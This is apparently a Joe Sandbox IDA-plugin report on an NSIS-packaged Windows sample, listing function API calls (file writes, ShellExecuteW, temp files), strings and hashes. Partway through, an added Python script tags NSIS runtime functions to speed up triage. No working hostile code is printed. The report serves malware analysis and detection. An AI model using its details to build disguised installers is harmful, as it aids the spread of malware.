                                                      • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                        • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                      • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                      • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                      • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                      • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                      • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                      • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                      • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                      • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                      • API String ID: 608394941-1650083594
                                                      • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                      • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                      • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                      • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                      • lstrcatW.KERNEL32(00000000,00000000,TravelersDevelopingImpactsJewsInstructorOriginal,004CB0B0,00000000,00000000), ref: 00401A76
                                                      • CompareFileTime.KERNEL32(-00000014,?,TravelersDevelopingImpactsJewsInstructorOriginal,TravelersDevelopingImpactsJewsInstructorOriginal,00000000,00000000,TravelersDevelopingImpactsJewsInstructorOriginal,004CB0B0,00000000,00000000), ref: 00401AA0
                                                        • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                        • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                        • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                        • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                        • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                      • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$TravelersDevelopingImpactsJewsInstructorOriginal
                                                      • API String ID: 4286501637-4034153992
                                                      • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                      • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                      • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                      • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                                      Control-flow Graph

                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00403598
                                                      • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                        • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                        • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                      • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                      Strings
                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                      • soft, xrefs: 00403675
                                                      • Error launching installer, xrefs: 004035D7
                                                      • Null, xrefs: 0040367E
                                                      • Inst, xrefs: 0040366C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                      • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                      • API String ID: 4283519449-527102705
                                                      • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                      • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                      • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                      • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

                                                      Control-flow Graph

                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 004033E7
                                                      • GetTickCount.KERNEL32 ref: 00403464
                                                      • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                      • wsprintfW.USER32 ref: 004034A4
                                                      • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                      • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: CountFileTickWrite$wsprintf
                                                      • String ID: ... %d%%$P1B$X1C$X1C
                                                      • API String ID: 651206458-1535804072
                                                      • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                      • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                      • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                      • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

Control-flow Graph (function 00404F72, blocks 404f72-405044; edge list and executed/not-executed colouring of the rendered graph omitted). API-calling blocks: 404fa9 lstrlenW, 404fb7 lstrlenW, 404fc9 lstrcatW, 404fd8 SetWindowTextW, 404feb SendMessageW * 3; subcall 406805 at 404fa0.
                                                      APIs
                                                      • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                      • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                      • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                      • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                        • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: same fourteen dumps of module 00400000 (00400000 through 0050E000) as listed for the first function entry above
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                      • String ID:
                                                      • API String ID: 2740478559-0
                                                      • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                      • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                      • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                      • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

Control-flow Graph (function 00401EB9, blocks 401eb9-4030f2; edge list and executed/not-executed colouring of the rendered graph omitted). API-calling blocks: 401f53 GlobalAlloc (then call 406805), 402387 GlobalFree; subcalls 4062a3 at 401ed5 and 401f2c, 406009 at 401f3c and 401ef7 (* 3), 406805 at 401ee4.
                                                      APIs
                                                        • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                      • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: same fourteen dumps of module 00400000 (00400000 through 0050E000) as listed for the first function entry above
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: FreeGloballstrcpyn
                                                      • String ID: Exch: stack < %d elements$Pop: stack empty$TravelersDevelopingImpactsJewsInstructorOriginal
                                                      • API String ID: 1459762280-2310787730
                                                      • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                      • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                      • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                      • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

Control-flow Graph (function 004022FD, blocks 4022fd-40238d; edge list and executed/not-executed colouring of the rendered graph omitted). API-calling blocks: 4022fd call 40145c, GetFileVersionInfoSizeW; 40232b GlobalAlloc; 40233f GetFileVersionInfoW; 402350 VerQueryValueW; 402369 call 405f51 * 2; 402384 GlobalFree.
                                                      APIs
                                                      • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                      • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                      • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                        • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                      • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: same fourteen dumps of module 00400000 (00400000 through 0050E000) as listed for the first function entry above
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                      • String ID:
                                                      • API String ID: 3376005127-0
                                                      • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                      • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                      • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                      • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

Control-flow Graph (function 00402B23, blocks 402b23-402b93; edge list and executed/not-executed colouring of the rendered graph omitted). API-calling blocks: 402b23 GlobalAlloc; 402b39 call 401446; 402b4b call 40145c, WideCharToMultiByte, lstrlenA; 402b75 call 405f6a, WriteFile; 402384 GlobalFree.
                                                      APIs
                                                      • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                      • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                      • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                      • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: same fourteen dumps of module 00400000 (00400000 through 0050E000) as listed for the first function entry above
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                      • String ID:
                                                      • API String ID: 2568930968-0
                                                      • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                      • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                      • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                      • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

Control-flow Graph (function 00402713, blocks 402713-40278c; edge list and executed/not-executed colouring of the rendered graph omitted). Blocks: 402713 call 406009 * 2; 40273d, 40274b, 40275a call 40145c; 402764 call 40145c, call 4062a3, WritePrivateProfileStringW.
                                                      APIs
                                                        • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                      Strings
                                                      • <RM>, xrefs: 00402713
                                                      • WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
                                                      • TravelersDevelopingImpactsJewsInstructorOriginal, xrefs: 00402770
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: same fourteen dumps of module 00400000 (00400000 through 0050E000) as listed for the first function entry above
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfileStringWritelstrcpyn
                                                      • String ID: <RM>$TravelersDevelopingImpactsJewsInstructorOriginal$WriteINIStr: wrote [%s] %s=%s in %s
                                                      • API String ID: 247603264-163489428
                                                      • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                      • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                      • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                      • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD
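The function entries above (the version-info query at 004022FD, the WideCharToMultiByte/WriteFile routine at 00402B23, WriteINIStr at 00402713, and the stack-handling routine at 00401EB9) are recognisable as the NSIS installer runtime from the log-format strings the report lists for them: "NSIS Error", "WriteINIStr: wrote [%s] %s=%s in %s", "RMDir: RemoveDirectory(\"%s\")", "Pop: stack empty" and "Exch: stack < %d elements". For an NSIS-packaged sample the behaviour worth analysing lives in the compiled script and the dropped files, not in these stub functions, so tagging them early saves triage time. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses the "APIs", "Strings" and "String ID" rows in the layout shown on this page (the row format is an assumption read off this page) and tags an entry when one of those runtime strings appears either in a string-valued API argument or in a string row. The sample entry is constructed from the WriteINIStr rows above.

```python
"""Parse the 'APIs', 'Strings' and 'String ID' rows of a Joe Sandbox function
entry and tag the entry as NSIS installer-runtime code when it carries the
NSIS runtime's own log-format strings.  Added example for this report; the
row layout it parses is an assumption taken from the rows on this page."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Log-format strings emitted by the NSIS installer runtime.  Every marker
# below occurs verbatim in the function entries of this report.
NSIS_RUNTIME_MARKERS = (
    "NSIS Error",
    "ExecShell: ",
    "WriteINIStr: wrote",
    "RMDir: RemoveDirectory",
    "Pop: stack empty",
    "Exch: stack < %d elements",
)


@dataclass
class ApiCall:
    function: str
    module: str
    args: List[str]
    ref: str                           # call-site address from the 'ref:' field
    subcall_of: Optional[str] = None   # set for 'Part of subcall function XXXXXXXX:' rows


@dataclass
class FunctionEntry:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)


def parse_api_row(row: str) -> Optional[ApiCall]:
    """'• Func.MODULE(arg,arg), ref: ADDR' -> ApiCall, or None if the row does not fit."""
    text = row.strip().lstrip("•").strip()
    subcall = None
    m = re.match(r"Part of subcall function ([0-9A-F]{8}):\s*(.*)", text)
    if m:
        subcall, text = m.group(1), m.group(2)
    head, sep, ref = text.rpartition(" ref: ")
    ref = ref.strip()
    if not sep or not re.fullmatch(r"[0-9A-F]{8}", ref):
        return None
    head = head.rstrip(",").strip()
    name, _, rest = head.partition("(")      # the first '(' opens the argument list
    func, _, module = name.partition(".")
    if not func or not module:
        return None
    args: List[str] = []
    if rest:
        inner = rest[: rest.rfind(")")] if ")" in rest else rest
        # Arguments are comma-separated; a comma inside a string-valued
        # argument would be split too, which the rows on this page avoid.
        args = [a.strip() for a in inner.split(",")]
    return ApiCall(func, module, args, ref, subcall)


def parse_entry(block: str) -> FunctionEntry:
    """Walk one function entry: bullet rows under 'APIs' and 'Strings' plus the
    '$'-separated 'String ID:' field feed the result."""
    entry = FunctionEntry()
    mode = None
    for raw in block.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            mode = "api"
        elif line == "Strings":
            mode = "str"
        elif line.startswith("• String ID:"):
            # NSIS variables such as $INSTDIR would also contain '$'; none occur on this page.
            values = line[len("• String ID:"):].split("$")
            entry.strings += [v.strip() for v in values if v.strip()]
        elif line.startswith("•") and mode == "api":
            call = parse_api_row(line)
            if call:
                entry.apis.append(call)
        elif line.startswith("•") and mode == "str":
            body = line.lstrip("•").strip()
            value, sep, _xref = body.rpartition(", xrefs: ")
            entry.strings.append(value if sep else body)
        else:
            mode = None   # any other heading ends the current list
    return entry


def nsis_markers(entry: FunctionEntry) -> List[str]:
    """Runtime markers found in string-valued API arguments or string rows."""
    haystack = list(entry.strings)
    for call in entry.apis:
        haystack.extend(call.args)
    return sorted({m for m in NSIS_RUNTIME_MARKERS for s in haystack if m in s})


# Constructed from the WriteINIStr entry (function 00402713) of this report.
SAMPLE_ENTRY = """\
APIs
  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
• WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
Strings
• <RM>, xrefs: 00402713
• WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
• TravelersDevelopingImpactsJewsInstructorOriginal, xrefs: 00402770
Memory Dump Source
• Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
"""

if __name__ == "__main__":
    entry = parse_entry(SAMPLE_ENTRY)
    for call in entry.apis:
        print(f"{call.ref} {call.function}.{call.module} args={len(call.args)} subcall_of={call.subcall_of}")
    print("NSIS runtime markers:", nsis_markers(entry))
```

Entries that produce no markers are the ones worth reversing by hand; on this page that is the unnamed string "TravelersDevelopingImpactsJewsInstructorOriginal", which is not an NSIS runtime message and is the kind of identifier the compiled script supplies.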

Control-flow Graph (function 004021B5, blocks 4021b5-4030f2; edge list and executed/not-executed colouring of the rendered graph omitted). Blocks: 4021b5 call 40145c * 4, call 404f72, ShellExecuteW; 40220d call 4062a3; 402223 call 4062a3.
                                                      APIs
                                                        • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                        • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                        • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                        • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                      • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                      Strings
                                                      • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                      • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                      • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                      • API String ID: 3156913733-2180253247
                                                      • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                      • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                      • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                      • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00405E9D
                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: CountFileNameTempTick
                                                      • String ID: nsa
                                                      • API String ID: 1716503409-2209301699
                                                      • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                      • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                      • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                      • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                      APIs
                                                      • ShowWindow.USER32(00000000,00000000), ref: 0040219F
